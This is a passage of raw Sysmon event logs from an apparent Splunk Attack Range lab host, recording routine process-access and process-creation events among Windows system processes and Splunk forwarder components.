Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C28D16F20C37F4C3BBEE9917A2AB2E0,SHA256=0378E00523430844168C5C1588E119DCE434D0618223F87A903B37BA2F81C61F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F6D-6216-1D04-000000003902}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0F6D-6216-1D04-000000003902}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.815{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F6D-6216-1D04-000000003902}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.816{4F8D34B0-0F6D-6216-1D04-000000003902}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.675{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0802B844581DC8DF0D4B7B2A1F7B226,SHA256=E94A9F1BAA6CD07BF10B5344262D192D2C62E4E5708535CFD239A24F3C77AB8E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.550{4F8D34B0-0F6D-6216-1C04-000000003902}20281216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F6D-6216-1C04-000000003902}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0F6D-6216-1C04-000000003902}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:49.315{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F6D-6216-1C04-000000003902}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 